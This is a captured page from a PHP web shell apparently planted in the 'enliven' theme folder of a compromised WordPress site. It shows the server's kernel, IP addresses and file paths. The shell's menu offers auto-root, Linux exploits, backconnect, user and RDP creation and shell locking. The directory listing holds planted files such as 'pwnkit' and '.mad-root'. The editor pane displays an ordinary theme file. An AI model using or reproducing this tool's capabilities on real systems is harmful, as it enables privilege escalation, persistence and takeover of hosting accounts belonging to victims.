Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
enliven /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
customizer
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
class-tgm-plugin-activation.ph...
114.88
KB
-rw-r--r--
custom-header.php
2.95
KB
-rw-r--r--
extras.php
5.49
KB
-rw-r--r--
jetpack.php
1.07
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
slider.php
5.65
KB
-rw-r--r--
template-tags.php
11.13
KB
-rw-r--r--
theme-info.php
2.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom-header.php
<?php /** * Sample implementation of the Custom Header feature. * * You can add an optional custom header image to header.php like so ... * <?php if ( get_header_image() ) : ?> <a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"> <img src="<?php header_image(); ?>" width="<?php echo esc_attr( get_custom_header()->width ); ?>" height="<?php echo esc_attr( get_custom_header()->height ); ?>" alt=""> </a> <?php endif; // End header image check. ?> * * @link https://developer.wordpress.org/themes/functionality/custom-headers/ * * @package Enliven */ /** * Set up the WordPress core custom header feature. * * @uses enliven_header_style() */ function enliven_custom_header_setup() { add_theme_support( 'custom-header', apply_filters( 'enliven_custom_header_args', array( 'default-image' => '', 'default-text-color' => '', 'width' => 1920, 'height' => 800, 'flex-height' => true, 'default-image' => get_template_directory_uri() . '/images/header.jpg' ) ) ); } add_action( 'after_setup_theme', 'enliven_custom_header_setup' ); /** * Header featured content. */ function enliven_featured_content() { /*if( is_home() && is_paged() ) { return false; } */ ?> <div class="enl-featured-container"> <div class="overlay"></div> <img src="<?php header_image(); ?>" width="<?php echo esc_attr( get_custom_header()->width ); ?>" height="<?php echo esc_attr( get_custom_header()->height ); ?>" alt=""> <div class="enl-featured-inner"> <div class="enl-featured-content"> <?php $header_title = get_theme_mod( 'header_title', 'Welcome to Enliven' ); $header_desc = get_theme_mod( 'header_description', 'The Ultimate Business WordPress Theme.' ); $first_button_text = get_theme_mod( 'header_btn_one_text', 'Download' ); $second_button_text = get_theme_mod( 'header_btn_two_text', 'Preview' ); $first_button_url = get_theme_mod( 'header_btn_one_url', '#' ); $second_button_url = get_theme_mod( 'header_btn_two_url', '#' ); ?> <?php if ( ! empty( $header_title ) ) : ?> <h1 class="enl-fcontent-title"><?php echo esc_html($header_title); ?></h1> <?php endif; ?> <?php if ( ! empty( $header_desc ) ) : ?> <div class="enl-fcontent-details"> <?php echo wp_kses_post( $header_desc ); ?> </div> <?php endif; ?> <?php if ( ! empty( $first_button_text ) ) : ?> <a class="enl-slide-btn-1" href="<?php echo esc_url( $first_button_url ); ?>"><?php echo esc_html( $first_button_text ) ?></a> <?php endif; ?> <?php if ( ! empty( $second_button_text ) ) : ?> <a class="enl-slide-btn-2" href="<?php echo esc_url( $second_button_url ); ?>"><?php echo esc_html( $second_button_text ) ?></a> <?php endif; ?> </div><!-- .enl-featured-content --> </div><!-- .enl-featured-inner --> </div><!-- .enl-featured-container --> <?php }
Close